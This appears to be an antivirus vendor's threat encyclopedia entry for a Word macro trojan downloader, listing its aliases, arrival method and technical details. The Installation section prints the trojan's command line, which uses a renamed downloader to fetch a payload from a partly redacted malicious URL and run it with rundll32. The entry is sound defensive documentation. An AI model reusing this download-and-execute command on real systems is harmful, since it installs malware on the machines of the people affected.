Trojan.W97M.BITSLODR.POL
March 17, 2020
ALIASES:
TrojanDownloader:O97M/Powdow.ARJ!MTB (Microsoft); VBA/TrojanDownloader.Agent.RZD trojan (NOD32)
PLATFORM:
Windows
OVERALL RISK RATING:
DAMAGE POTENTIAL:
DISTRIBUTION POTENTIAL:
REPORTED INFECTION:
INFORMATION EXPOSURE:
Threat Type: Trojan
Destructiveness: No
Encrypted:
In the wild: Yes
OVERVIEW
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
However, as of this writing, the said sites are inaccessible.
TECHNICAL DETAILS
File Size: 93,441 bytes
Memory Resident: No
Initial Samples Received Date: 13 Mar 2020
Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
This Trojan drops the following files:
- %Temp%\curl.com
It adds the following processes:
- "%System%\cmd.exe" /c %Temp%\curl.com /transfer jobname http://{BLOCKED}tdriold.com/f64bj/jtrhs.php?l=ghs3.cab %Temp%\12345.dll&& rundll32 %Temp%\12345.dll,DllRegisterServer
Other Details
This Trojan connects to the following possibly malicious URL:
- http://{BLOCKED}tdriold.com/f64bj/jtrhs.php?l=ghs3.cab
However, as of this writing, the said sites are inaccessible.